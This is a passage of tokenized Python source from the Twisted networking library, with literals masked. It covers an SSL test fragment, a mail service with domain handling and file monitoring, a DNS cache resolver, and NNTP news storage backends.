makeTestCaseClasses ( ) ) <EOL> globals ( ) . update ( TLSPortTestsBuilder ( ) . makeTestCaseClasses ( ) ) <EOL> class AbortSSLConnectionTest ( ReactorBuilder , AbortConnectionMixin , ContextGeneratingMixin ) : <EOL> """<STR_LIT>""" <EOL> requiredInterfaces = ( IReactorSSL , ) <EOL> endpoints = SSLCreator ( ) <EOL> def buildReactor ( self ) : <EOL> reactor = ReactorBuilder . buildReactor ( self ) <EOL> try : <EOL> from twisted . protocols import tls <EOL> except ImportError : <EOL> return reactor <EOL> cooperator = Cooperator ( <EOL> scheduler = lambda x : reactor . callLater ( <NUM_LIT> , x ) ) <EOL> self . patch ( tls , "<STR_LIT>" , cooperator . cooperate ) <EOL> return reactor <EOL> def setUp ( self ) : <EOL> if FILETYPE_PEM is None : <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> globals ( ) . update ( AbortSSLConnectionTest . makeTestCaseClasses ( ) ) </s>
<s> """<STR_LIT>""" <EOL> from twisted . internet import defer <EOL> from twisted . application import service , internet <EOL> from twisted . python import util <EOL> from twisted . python import log <EOL> from twisted . cred . portal import Portal <EOL> from twisted . mail import protocols , smtp <EOL> import os <EOL> from zope . interface import implements , Interface <EOL> class DomainWithDefaultDict : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , domains , default ) : <EOL> """<STR_LIT>""" <EOL> self . domains = domains <EOL> self . default = default <EOL> def setDefaultDomain ( self , domain ) : <EOL> """<STR_LIT>""" <EOL> self . default = domain <EOL> def has_key ( self , name ) : <EOL> """<STR_LIT>""" <EOL> return <NUM_LIT:1> <EOL> def fromkeys ( klass , keys , value = None ) : <EOL> """<STR_LIT>""" <EOL> d = klass ( ) <EOL> for k in keys : <EOL> d [ k ] = value <EOL> return d <EOL> fromkeys = classmethod ( fromkeys ) <EOL> def __contains__ ( self , name ) : <EOL> """<STR_LIT>""" <EOL> return <NUM_LIT:1> <EOL> def __getitem__ ( self , name ) : <EOL> """<STR_LIT>""" <EOL> return self . domains . get ( name , self . default ) <EOL> def __setitem__ ( self , name , value ) : <EOL> """<STR_LIT>""" <EOL> self . domains [ name ] = value <EOL> def __delitem__ ( self , name ) : <EOL> """<STR_LIT>""" <EOL> del self . domains [ name ] <EOL> def __iter__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return iter ( self . domains ) <EOL> def __len__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return len ( self . domains ) <EOL> def __str__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' % ( self . domains , ) <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' % ( self . domains , ) <EOL> def get ( self , key , default = None ) : <EOL> """<STR_LIT>""" <EOL> return self . domains . get ( key , default ) <EOL> def copy ( self ) : <EOL> """<STR_LIT>""" <EOL> return DomainWithDefaultDict ( self . domains . copy ( ) , self . default ) <EOL> def iteritems ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . domains . iteritems ( ) <EOL> def iterkeys ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . domains . iterkeys ( ) <EOL> def itervalues ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . domains . itervalues ( ) <EOL> def keys ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . domains . keys ( ) <EOL> def values ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . domains . values ( ) <EOL> def items ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . domains . items ( ) <EOL> def popitem ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . domains . popitem ( ) <EOL> def update ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return self . domains . update ( other ) <EOL> def clear ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . domains . clear ( ) <EOL> def setdefault ( self , key , default ) : <EOL> """<STR_LIT>""" <EOL> return self . domains . setdefault ( key , default ) <EOL> class IDomain ( Interface ) : <EOL> """<STR_LIT>""" <EOL> def exists ( user ) : <EOL> """<STR_LIT>""" <EOL> def addUser ( user , password ) : <EOL> """<STR_LIT>""" <EOL> def getCredentialsCheckers ( ) : <EOL> """<STR_LIT>""" <EOL> class IAliasableDomain ( IDomain ) : <EOL> """<STR_LIT>""" <EOL> def setAliasGroup ( aliases ) : <EOL> """<STR_LIT>""" <EOL> def exists ( user , memo = None ) : <EOL> """<STR_LIT>""" <EOL> class BounceDomain : <EOL> """<STR_LIT>""" <EOL> implements ( IDomain ) <EOL> def exists ( self , user ) : <EOL> """<STR_LIT>""" <EOL> raise smtp . SMTPBadRcpt ( user ) <EOL> def willRelay ( self , user , protocol ) : <EOL> """<STR_LIT>""" <EOL> return False <EOL> def addUser ( self , user , password ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def getCredentialsCheckers ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ ] <EOL> class FileMessage : <EOL> """<STR_LIT>""" <EOL> implements ( smtp . IMessage ) <EOL> def __init__ ( self , fp , name , finalName ) : <EOL> """<STR_LIT>""" <EOL> self . fp = fp <EOL> self . name = name <EOL> self . finalName = finalName <EOL> def lineReceived ( self , line ) : <EOL> """<STR_LIT>""" <EOL> self . fp . write ( line + '<STR_LIT:\n>' ) <EOL> def eomReceived ( self ) : <EOL> """<STR_LIT>""" <EOL> self . fp . close ( ) <EOL> os . rename ( self . name , self . finalName ) <EOL> return defer . succeed ( self . finalName ) <EOL> def connectionLost ( self ) : <EOL> """<STR_LIT>""" <EOL> self . fp . close ( ) <EOL> os . remove ( self . name ) <EOL> class MailService ( service . MultiService ) : <EOL> """<STR_LIT>""" <EOL> queue = None <EOL> domains = None <EOL> portals = None <EOL> aliases = None <EOL> smtpPortal = None <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> service . MultiService . __init__ ( self ) <EOL> self . domains = DomainWithDefaultDict ( { } , BounceDomain ( ) ) <EOL> self . portals = { } <EOL> self . monitor = FileMonitoringService ( ) <EOL> self . monitor . setServiceParent ( self ) <EOL> self . smtpPortal = Portal ( self ) <EOL> def getPOP3Factory ( self ) : <EOL> """<STR_LIT>""" <EOL> return protocols . POP3Factory ( self ) <EOL> def getSMTPFactory ( self ) : <EOL> """<STR_LIT>""" <EOL> return protocols . SMTPFactory ( self , self . smtpPortal ) <EOL> def getESMTPFactory ( self ) : <EOL> """<STR_LIT>""" <EOL> return protocols . ESMTPFactory ( self , self . smtpPortal ) <EOL> def addDomain ( self , name , domain ) : <EOL> """<STR_LIT>""" <EOL> portal = Portal ( domain ) <EOL> map ( portal . registerChecker , domain . getCredentialsCheckers ( ) ) <EOL> self . domains [ name ] = domain <EOL> self . portals [ name ] = portal <EOL> if self . aliases and IAliasableDomain . providedBy ( domain ) : <EOL> domain . setAliasGroup ( self . aliases ) <EOL> def setQueue ( self , queue ) : <EOL> """<STR_LIT>""" <EOL> self . queue = queue <EOL> def requestAvatar ( self , avatarId , mind , * interfaces ) : <EOL> """<STR_LIT>""" <EOL> if smtp . IMessageDelivery in interfaces : <EOL> a = protocols . ESMTPDomainDelivery ( self , avatarId ) <EOL> return smtp . IMessageDelivery , a , lambda : None <EOL> raise NotImplementedError ( ) <EOL> def lookupPortal ( self , name ) : <EOL> """<STR_LIT>""" <EOL> return self . portals [ name ] <EOL> def defaultPortal ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . portals [ '<STR_LIT>' ] <EOL> class FileMonitoringService ( internet . TimerService ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> self . files = [ ] <EOL> self . intervals = iter ( util . IntervalDifferential ( [ ] , <NUM_LIT> ) ) <EOL> def startService ( self ) : <EOL> """<STR_LIT>""" <EOL> service . Service . startService ( self ) <EOL> self . _setupMonitor ( ) <EOL> def _setupMonitor ( self ) : <EOL> """<STR_LIT>""" <EOL> from twisted . internet import reactor <EOL> t , self . index = self . intervals . next ( ) <EOL> self . _call = reactor . callLater ( t , self . _monitor ) <EOL> def stopService ( self ) : <EOL> """<STR_LIT>""" <EOL> service . Service . stopService ( self ) <EOL> if self . _call : <EOL> self . _call . cancel ( ) <EOL> self . _call = None <EOL> def monitorFile ( self , name , callback , interval = <NUM_LIT:10> ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> mtime = os . path . getmtime ( name ) <EOL> except : <EOL> mtime = <NUM_LIT:0> <EOL> self . files . append ( [ interval , name , callback , mtime ] ) <EOL> self . intervals . addInterval ( interval ) <EOL> def unmonitorFile ( self , name ) : <EOL> """<STR_LIT>""" <EOL> for i in range ( len ( self . files ) ) : <EOL> if name == self . files [ i ] [ <NUM_LIT:1> ] : <EOL> self . intervals . removeInterval ( self . files [ i ] [ <NUM_LIT:0> ] ) <EOL> del self . files [ i ] <EOL> break <EOL> def _monitor ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _call = None <EOL> if self . index is not None : <EOL> name , callback , mtime = self . files [ self . index ] [ <NUM_LIT:1> : ] <EOL> try : <EOL> now = os . path . getmtime ( name ) <EOL> except : <EOL> now = <NUM_LIT:0> <EOL> if now > mtime : <EOL> log . msg ( "<STR_LIT>" % ( name , ) ) <EOL> self . files [ self . index ] [ <NUM_LIT:3> ] = now <EOL> callback ( name ) <EOL> self . _setupMonitor ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division , absolute_import <EOL> from twisted . names import dns , common <EOL> from twisted . python import failure , log <EOL> from twisted . internet import defer <EOL> class CacheResolver ( common . ResolverBase ) : <EOL> """<STR_LIT>""" <EOL> cache = None <EOL> def __init__ ( self , cache = None , verbose = <NUM_LIT:0> , reactor = None ) : <EOL> common . ResolverBase . __init__ ( self ) <EOL> self . cache = { } <EOL> self . verbose = verbose <EOL> self . cancel = { } <EOL> if reactor is None : <EOL> from twisted . internet import reactor <EOL> self . _reactor = reactor <EOL> if cache : <EOL> for query , ( seconds , payload ) in cache . items ( ) : <EOL> self . cacheResult ( query , payload , seconds ) <EOL> def __setstate__ ( self , state ) : <EOL> self . __dict__ = state <EOL> now = self . _reactor . seconds ( ) <EOL> for ( k , ( when , ( ans , add , ns ) ) ) in self . cache . items ( ) : <EOL> diff = now - when <EOL> for rec in ans + add + ns : <EOL> if rec . ttl < diff : <EOL> del self . cache [ k ] <EOL> break <EOL> def __getstate__ ( self ) : <EOL> for c in self . cancel . values ( ) : <EOL> c . cancel ( ) <EOL> self . cancel . clear ( ) <EOL> return self . __dict__ <EOL> def _lookup ( self , name , cls , type , timeout ) : <EOL> now = self . _reactor . seconds ( ) <EOL> q = dns . Query ( name , type , cls ) <EOL> try : <EOL> when , ( ans , auth , add ) = self . cache [ q ] <EOL> except KeyError : <EOL> if self . verbose > <NUM_LIT:1> : <EOL> log . msg ( '<STR_LIT>' + repr ( name ) ) <EOL> return defer . fail ( failure . Failure ( dns . DomainError ( name ) ) ) <EOL> else : <EOL> if self . verbose : <EOL> log . msg ( '<STR_LIT>' + repr ( name ) ) <EOL> diff = now - when <EOL> try : <EOL> result = ( <EOL> [ dns . RRHeader ( r . name . name , r . type , r . cls , r . ttl - diff , <EOL> r . payload ) for r in ans ] , <EOL> [ dns . RRHeader ( r . name . name , r . type , r . cls , r . ttl - diff , <EOL> r . payload ) for r in auth ] , <EOL> [ dns . RRHeader ( r . name . name , r . type , r . cls , r . ttl - diff , <EOL> r . payload ) for r in add ] ) <EOL> except ValueError : <EOL> return defer . fail ( failure . Failure ( dns . DomainError ( name ) ) ) <EOL> else : <EOL> return defer . succeed ( result ) <EOL> def lookupAllRecords ( self , name , timeout = None ) : <EOL> return defer . fail ( failure . Failure ( dns . DomainError ( name ) ) ) <EOL> def cacheResult ( self , query , payload , cacheTime = None ) : <EOL> """<STR_LIT>""" <EOL> if self . verbose > <NUM_LIT:1> : <EOL> log . msg ( '<STR_LIT>' % query ) <EOL> self . cache [ query ] = ( cacheTime or self . _reactor . seconds ( ) , payload ) <EOL> if query in self . cancel : <EOL> self . cancel [ query ] . cancel ( ) <EOL> s = list ( payload [ <NUM_LIT:0> ] ) + list ( payload [ <NUM_LIT:1> ] ) + list ( payload [ <NUM_LIT:2> ] ) <EOL> if s : <EOL> m = s [ <NUM_LIT:0> ] . ttl <EOL> for r in s : <EOL> m = min ( m , r . ttl ) <EOL> else : <EOL> m = <NUM_LIT:0> <EOL> self . cancel [ query ] = self . _reactor . callLater ( m , self . clearEntry , query ) <EOL> def clearEntry ( self , query ) : <EOL> del self . cache [ query ] <EOL> del self . cancel [ query ] </s>
<s> """<STR_LIT>""" <EOL> import getpass , pickle , time , socket <EOL> import os <EOL> import StringIO <EOL> from hashlib import md5 <EOL> from email . Message import Message <EOL> from email . Generator import Generator <EOL> from zope . interface import implements , Interface <EOL> from twisted . news . nntp import NNTPError <EOL> from twisted . mail import smtp <EOL> from twisted . internet import defer <EOL> from twisted . enterprise import adbapi <EOL> from twisted . persisted import dirdbm <EOL> ERR_NOGROUP , ERR_NOARTICLE = range ( <NUM_LIT:2> , <NUM_LIT:4> ) <EOL> OVERVIEW_FMT = [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> ] <EOL> def hexdigest ( md5 ) : <EOL> return '<STR_LIT>' . join ( map ( lambda x : hex ( ord ( x ) ) [ <NUM_LIT:2> : ] , md5 . digest ( ) ) ) <EOL> class Article : <EOL> def __init__ ( self , head , body ) : <EOL> self . body = body <EOL> self . headers = { } <EOL> header = None <EOL> for line in head . split ( '<STR_LIT:\r\n>' ) : <EOL> if line [ <NUM_LIT:0> ] in '<STR_LIT>' : <EOL> i = list ( self . headers [ header ] ) <EOL> i [ <NUM_LIT:1> ] += '<STR_LIT:\r\n>' + line <EOL> else : <EOL> i = line . split ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> header = i [ <NUM_LIT:0> ] . lower ( ) <EOL> self . headers [ header ] = tuple ( i ) <EOL> if not self . getHeader ( '<STR_LIT>' ) : <EOL> s = str ( time . time ( ) ) + self . body <EOL> id = hexdigest ( md5 ( s ) ) + '<STR_LIT:@>' + socket . gethostname ( ) <EOL> self . putHeader ( '<STR_LIT>' , '<STR_LIT>' % id ) <EOL> if not self . getHeader ( '<STR_LIT>' ) : <EOL> self . putHeader ( '<STR_LIT>' , str ( len ( self . body ) ) ) <EOL> if not self . getHeader ( '<STR_LIT>' ) : <EOL> self . putHeader ( '<STR_LIT>' , str ( self . body . count ( '<STR_LIT:\n>' ) ) ) <EOL> if not self . getHeader ( '<STR_LIT>' ) : <EOL> self . putHeader ( '<STR_LIT>' , time . ctime ( time . time ( ) ) ) <EOL> def getHeader ( self , header ) : <EOL> h = header . lower ( ) <EOL> if h in self . headers : <EOL> return self . headers [ h ] [ <NUM_LIT:1> ] <EOL> else : <EOL> return '<STR_LIT>' <EOL> def putHeader ( self , header , value ) : <EOL> self . headers [ header . lower ( ) ] = ( header , value ) <EOL> def textHeaders ( self ) : <EOL> headers = [ ] <EOL> for i in self . headers . values ( ) : <EOL> headers . append ( '<STR_LIT>' % i ) <EOL> return '<STR_LIT:\r\n>' . join ( headers ) + '<STR_LIT:\r\n>' <EOL> def overview ( self ) : <EOL> xover = [ ] <EOL> for i in OVERVIEW_FMT : <EOL> xover . append ( self . getHeader ( i ) ) <EOL> return xover <EOL> class NewsServerError ( Exception ) : <EOL> pass <EOL> class INewsStorage ( Interface ) : <EOL> """<STR_LIT>""" <EOL> def listRequest ( ) : <EOL> """<STR_LIT>""" <EOL> def subscriptionRequest ( ) : <EOL> """<STR_LIT>""" <EOL> def postRequest ( message ) : <EOL> """<STR_LIT>""" <EOL> def overviewRequest ( ) : <EOL> """<STR_LIT>""" <EOL> def xoverRequest ( group , low , high ) : <EOL> """<STR_LIT>""" <EOL> def xhdrRequest ( group , low , high , header ) : <EOL> """<STR_LIT>""" <EOL> def listGroupRequest ( group ) : <EOL> """<STR_LIT>""" <EOL> def groupRequest ( group ) : <EOL> """<STR_LIT>""" <EOL> def articleExistsRequest ( id ) : <EOL> """<STR_LIT>""" <EOL> def articleRequest ( group , index , id = None ) : <EOL> """<STR_LIT>""" <EOL> def headRequest ( group , index ) : <EOL> """<STR_LIT>""" <EOL> def bodyRequest ( group , index ) : <EOL> """<STR_LIT>""" <EOL> class NewsStorage : <EOL> """<STR_LIT>""" <EOL> def listRequest ( self ) : <EOL> raise NotImplementedError ( ) <EOL> def subscriptionRequest ( self ) : <EOL> raise NotImplementedError ( ) <EOL> def postRequest ( self , message ) : <EOL> raise NotImplementedError ( ) <EOL> def overviewRequest ( self ) : <EOL> return defer . succeed ( OVERVIEW_FMT ) <EOL> def xoverRequest ( self , group , low , high ) : <EOL> raise NotImplementedError ( ) <EOL> def xhdrRequest ( self , group , low , high , header ) : <EOL> raise NotImplementedError ( ) <EOL> def listGroupRequest ( self , group ) : <EOL> raise NotImplementedError ( ) <EOL> def groupRequest ( self , group ) : <EOL> raise NotImplementedError ( ) <EOL> def articleExistsRequest ( self , id ) : <EOL> raise NotImplementedError ( ) <EOL> def articleRequest ( self , group , index , id = None ) : <EOL> raise NotImplementedError ( ) <EOL> def headRequest ( self , group , index ) : <EOL> raise NotImplementedError ( ) <EOL> def bodyRequest ( self , group , index ) : <EOL> raise NotImplementedError ( ) <EOL> class _ModerationMixin : <EOL> """<STR_LIT>""" <EOL> sendmail = staticmethod ( smtp . sendmail ) <EOL> def notifyModerators ( self , moderators , article ) : <EOL> """<STR_LIT>""" <EOL> group = article . getHeader ( '<STR_LIT>' ) <EOL> subject = article . getHeader ( '<STR_LIT>' ) <EOL> if self . _sender is None : <EOL> sender = '<STR_LIT>' + socket . gethostname ( ) <EOL> else : <EOL> sender = self . _sender <EOL> msg = Message ( ) <EOL> msg [ '<STR_LIT>' ] = smtp . messageid ( ) <EOL> msg [ '<STR_LIT>' ] = sender <EOL> msg [ '<STR_LIT>' ] = '<STR_LIT:U+002CU+0020>' . join ( moderators ) <EOL> msg [ '<STR_LIT>' ] = '<STR_LIT>' % ( group , subject ) <EOL> msg [ '<STR_LIT:Content-Type>' ] = '<STR_LIT>' <EOL> payload = Message ( ) <EOL> for header , value in article . headers . values ( ) : <EOL> payload . add_header ( header , value ) <EOL> payload . set_payload ( article . body ) <EOL> msg . attach ( payload ) <EOL> out = StringIO . StringIO ( ) <EOL> gen = Generator ( out , False ) <EOL> gen . flatten ( msg ) <EOL> msg = out . getvalue ( ) <EOL> return self . sendmail ( self . _mailhost , sender , moderators , msg ) <EOL> class PickleStorage ( _ModerationMixin ) : <EOL> """<STR_LIT>""" <EOL> implements ( INewsStorage ) <EOL> sharedDBs = { } <EOL> def __init__ ( self , filename , groups = None , moderators = ( ) , <EOL> mailhost = None , sender = None ) : <EOL> """<STR_LIT>""" <EOL> self . datafile = filename <EOL> self . load ( filename , groups , moderators ) <EOL> self . _mailhost = mailhost <EOL> self . _sender = sender <EOL> def getModerators ( self , groups ) : <EOL> moderators = [ ] <EOL> for group in groups : <EOL> moderators . extend ( self . db [ '<STR_LIT>' ] . get ( group , None ) ) <EOL> return filter ( None , moderators ) <EOL> def listRequest ( self ) : <EOL> "<STR_LIT>" <EOL> l = self . db [ '<STR_LIT>' ] <EOL> r = [ ] <EOL> for i in l : <EOL> if len ( self . db [ i ] . keys ( ) ) : <EOL> low = min ( self . db [ i ] . keys ( ) ) <EOL> high = max ( self . db [ i ] . keys ( ) ) + <NUM_LIT:1> <EOL> else : <EOL> low = high = <NUM_LIT:0> <EOL> if self . db [ '<STR_LIT>' ] . has_key ( i ) : <EOL> flags = '<STR_LIT:m>' <EOL> else : <EOL> flags = '<STR_LIT:y>' <EOL> r . append ( ( i , high , low , flags ) ) <EOL> return defer . succeed ( r ) <EOL> def subscriptionRequest ( self ) : <EOL> return defer . succeed ( [ '<STR_LIT>' ] ) <EOL> def postRequest ( self , message ) : <EOL> cleave = message . find ( '<STR_LIT>' ) <EOL> headers , article = message [ : cleave ] , message [ cleave + <NUM_LIT:4> : ] <EOL> a = Article ( headers , article ) <EOL> groups = a . getHeader ( '<STR_LIT>' ) . split ( ) <EOL> xref = [ ] <EOL> moderators = self . getModerators ( groups ) <EOL> if moderators and not a . getHeader ( '<STR_LIT>' ) : <EOL> return self . notifyModerators ( moderators , a ) <EOL> for group in groups : <EOL> if group in self . db : <EOL> if len ( self . db [ group ] . keys ( ) ) : <EOL> index = max ( self . db [ group ] . keys ( ) ) + <NUM_LIT:1> <EOL> else : <EOL> index = <NUM_LIT:1> <EOL> xref . append ( ( group , str ( index ) ) ) <EOL> self . db [ group ] [ index ] = a <EOL> if len ( xref ) == <NUM_LIT:0> : <EOL> return defer . fail ( None ) <EOL> a . putHeader ( '<STR_LIT>' , '<STR_LIT>' % ( <EOL> socket . gethostname ( ) . split ( ) [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' . join ( map ( lambda x : '<STR_LIT::>' . join ( x ) , xref ) ) <EOL> ) ) <EOL> self . flush ( ) <EOL> return defer . succeed ( None ) <EOL> def overviewRequest ( self ) : <EOL> return defer . succeed ( OVERVIEW_FMT ) <EOL> def xoverRequest ( self , group , low , high ) : <EOL> if not self . db . has_key ( group ) : <EOL> return defer . succeed ( [ ] ) <EOL> r = [ ] <EOL> for i in self . db [ group ] . keys ( ) : <EOL> if ( low is None or i >= low ) and ( high is None or i <= high ) : <EOL> r . append ( [ str ( i ) ] + self . db [ group ] [ i ] . overview ( ) ) <EOL> return defer . succeed ( r ) <EOL> def xhdrRequest ( self , group , low , high , header ) : <EOL> if not self . db . has_key ( group ) : <EOL> return defer . succeed ( [ ] ) <EOL> r = [ ] <EOL> for i in self . db [ group ] . keys ( ) : <EOL> if low is None or i >= low and high is None or i <= high : <EOL> r . append ( ( i , self . db [ group ] [ i ] . getHeader ( header ) ) ) <EOL> return defer . succeed ( r ) <EOL> def listGroupRequest ( self , group ) : <EOL> if self . db . has_key ( group ) : <EOL> return defer . succeed ( ( group , self . db [ group ] . keys ( ) ) ) <EOL> else : <EOL> return defer . fail ( None ) <EOL> def groupRequest ( self , group ) : <EOL> if self . db . has_key ( group ) : <EOL> if len ( self . db [ group ] . keys ( ) ) : <EOL> num = len ( self . db [ group ] . keys ( ) ) <EOL> low = min ( self . db [ group ] . keys ( ) ) <EOL> high = max ( self . db [ group ] . keys ( ) ) <EOL> else : <EOL> num = low = high = <NUM_LIT:0> <EOL> flags = '<STR_LIT:y>' <EOL> return defer . succeed ( ( group , num , high , low , flags ) ) <EOL> else : <EOL> return defer . fail ( ERR_NOGROUP ) <EOL> def articleExistsRequest ( self , id ) : <EOL> for group in self . db [ '<STR_LIT>' ] : <EOL> for a in self . db [ group ] . values ( ) : <EOL> if a . getHeader ( '<STR_LIT>' ) == id : <EOL> return defer . succeed ( <NUM_LIT:1> ) <EOL> return defer . succeed ( <NUM_LIT:0> ) <EOL> def articleRequest ( self , group , index , id = None ) : <EOL> if id is not None : <EOL> raise NotImplementedError <EOL> if self . db . has_key ( group ) : <EOL> if self . db [ group ] . has_key ( index ) : <EOL> a = self . db [ group ] [ index ] <EOL> return defer . succeed ( ( <EOL> index , <EOL> a . getHeader ( '<STR_LIT>' ) , <EOL> StringIO . StringIO ( a . textHeaders ( ) + '<STR_LIT:\r\n>' + a . body ) <EOL> ) ) <EOL> else : <EOL> return defer . fail ( ERR_NOARTICLE ) <EOL> else : <EOL> return defer . fail ( ERR_NOGROUP ) <EOL> def headRequest ( self , group , index ) : <EOL> if self . db . has_key ( group ) : <EOL> if self . db [ group ] . has_key ( index ) : <EOL> a = self . db [ group ] [ index ] <EOL> return defer . succeed ( ( index , a . getHeader ( '<STR_LIT>' ) , a . textHeaders ( ) ) ) <EOL> else : <EOL> return defer . fail ( ERR_NOARTICLE ) <EOL> else : <EOL> return defer . fail ( ERR_NOGROUP ) <EOL> def bodyRequest ( self , group , index ) : <EOL> if self . db . has_key ( group ) : <EOL> if self . db [ group ] . has_key ( index ) : <EOL> a = self . db [ group ] [ index ] <EOL> return defer . succeed ( ( index , a . getHeader ( '<STR_LIT>' ) , StringIO . StringIO ( a . body ) ) ) <EOL> else : <EOL> return defer . fail ( ERR_NOARTICLE ) <EOL> else : <EOL> return defer . fail ( ERR_NOGROUP ) <EOL> def flush ( self ) : <EOL> f = open ( self . datafile , '<STR_LIT:w>' ) <EOL> pickle . dump ( self . db , f ) <EOL> f . close ( ) <EOL> def load ( self , filename , groups = None , moderators = ( ) ) : <EOL> if filename in PickleStorage . sharedDBs : <EOL> self . db = PickleStorage . sharedDBs [ filename ] <EOL> else : <EOL> try : <EOL> self . db = pickle . load ( open ( filename ) ) <EOL> PickleStorage . sharedDBs [ filename ] = self . db <EOL> except IOError : <EOL> self . db = PickleStorage . sharedDBs [ filename ] = { } <EOL> self . db [ '<STR_LIT>' ] = groups <EOL> if groups is not None : <EOL> for i in groups : <EOL> self . db [ i ] = { } <EOL> self . db [ '<STR_LIT>' ] = dict ( moderators ) <EOL> self . flush ( ) <EOL> class Group : <EOL> name = None <EOL> flags = '<STR_LIT>' <EOL> minArticle = <NUM_LIT:1> <EOL> maxArticle = <NUM_LIT:0> <EOL> articles = None <EOL> def __init__ ( self , name , flags = '<STR_LIT:y>' ) : <EOL> self . name = name <EOL> self . flags = flags <EOL> self . articles = { } <EOL> class NewsShelf ( _ModerationMixin ) : <EOL> """<STR_LIT>""" <EOL> implements ( INewsStorage ) <EOL> def __init__ ( self , mailhost , path , sender = None ) : <EOL> """<STR_LIT>""" <EOL> self . path = path <EOL> self . _mailhost = self . mailhost = mailhost <EOL> self . _sender = sender <EOL> if not os . path . exists ( path ) : <EOL> os . mkdir ( path ) <EOL> self . dbm = dirdbm . Shelf ( os . path . join ( path , "<STR_LIT>" ) ) <EOL> if not len ( self . dbm . keys ( ) ) : <EOL> self . initialize ( ) <EOL> def initialize ( self ) : <EOL> self . dbm [ '<STR_LIT>' ] = dirdbm . Shelf ( os . path . join ( self . path , '<STR_LIT>' ) ) <EOL> self . dbm [ '<STR_LIT>' ] = dirdbm . Shelf ( os . path . join ( self . path , '<STR_LIT>' ) ) <EOL> self . dbm [ '<STR_LIT>' ] = [ ] <EOL> self . dbm [ '<STR_LIT>' ] = dirdbm . Shelf ( os . path . join ( self . path , '<STR_LIT>' ) ) <EOL> def addGroup ( self , name , flags ) : <EOL> self . dbm [ '<STR_LIT>' ] [ name ] = Group ( name , flags ) <EOL> def addSubscription ( self , name ) : <EOL> self . dbm [ '<STR_LIT>' ] = self . dbm [ '<STR_LIT>' ] + [ name ] <EOL> def addModerator ( self , group , email ) : <EOL> self . dbm [ '<STR_LIT>' ] [ group ] = email <EOL> def listRequest ( self ) : <EOL> result = [ ] <EOL> for g in self . dbm [ '<STR_LIT>' ] . values ( ) : <EOL> result . append ( ( g . name , g . maxArticle , g . minArticle , g . flags ) ) <EOL> return defer . succeed ( result ) <EOL> def subscriptionRequest ( self ) : <EOL> return defer . succeed ( self . dbm [ '<STR_LIT>' ] ) <EOL> def getModerator ( self , groups ) : <EOL> for group in groups : <EOL> try : <EOL> return self . dbm [ '<STR_LIT>' ] [ group ] <EOL> except KeyError : <EOL> pass <EOL> return None <EOL> def notifyModerator ( self , moderator , article ) : <EOL> """<STR_LIT>""" <EOL> return self . notifyModerators ( [ moderator ] , article ) <EOL> def postRequest ( self , message ) : <EOL> cleave = message . find ( '<STR_LIT>' ) <EOL> headers , article = message [ : cleave ] , message [ cleave + <NUM_LIT:4> : ] <EOL> article = Article ( headers , article ) <EOL> groups = article . getHeader ( '<STR_LIT>' ) . split ( ) <EOL> xref = [ ] <EOL> moderator = self . getModerator ( groups ) <EOL> if moderator and not article . getHeader ( '<STR_LIT>' ) : <EOL> return self . notifyModerators ( [ moderator ] , article ) <EOL> for group in groups : <EOL> try : <EOL> g = self . dbm [ '<STR_LIT>' ] [ group ] <EOL> except KeyError : <EOL> pass <EOL> else : <EOL> index = g . maxArticle + <NUM_LIT:1> <EOL> g . maxArticle += <NUM_LIT:1> <EOL> g . articles [ index ] = article <EOL> xref . append ( ( group , str ( index ) ) ) <EOL> self . dbm [ '<STR_LIT>' ] [ group ] = g <EOL> if not xref : <EOL> return defer . fail ( NewsServerError ( "<STR_LIT>" + '<STR_LIT:U+0020>' . join ( groups ) ) ) <EOL> article . putHeader ( '<STR_LIT>' , '<STR_LIT>' % ( socket . gethostname ( ) . split ( ) [ <NUM_LIT:0> ] , '<STR_LIT:U+0020>' . join ( map ( lambda x : '<STR_LIT::>' . join ( x ) , xref ) ) ) ) <EOL> self . dbm [ '<STR_LIT>' ] [ article . getHeader ( '<STR_LIT>' ) ] = xref <EOL> return defer . succeed ( None ) <EOL> def overviewRequest ( self ) : <EOL> return defer . succeed ( OVERVIEW_FMT ) <EOL> def xoverRequest ( self , group , low , high ) : <EOL> if not self . dbm [ '<STR_LIT>' ] . has_key ( group ) : <EOL> return defer . succeed ( [ ] ) <EOL> if low is None : <EOL> low = <NUM_LIT:0> <EOL> if high is None : <EOL> high = self . dbm [ '<STR_LIT>' ] [ group ] . maxArticle <EOL> r = [ ] <EOL> for i in range ( low , high + <NUM_LIT:1> ) : <EOL> if self . dbm [ '<STR_LIT>' ] [ group ] . articles . has_key ( i ) : <EOL> r . append ( [ str ( i ) ] + self . dbm [ '<STR_LIT>' ] [ group ] . articles [ i ] . overview ( ) ) <EOL> return defer . succeed ( r ) <EOL> def xhdrRequest ( self , group , low , high , header ) : <EOL> if group not in self . dbm [ '<STR_LIT>' ] : <EOL> return defer . succeed ( [ ] ) <EOL> if low is None : <EOL> low = <NUM_LIT:0> <EOL> if high is None : <EOL> high = self . dbm [ '<STR_LIT>' ] [ group ] . maxArticle <EOL> r = [ ] <EOL> for i in range ( low , high + 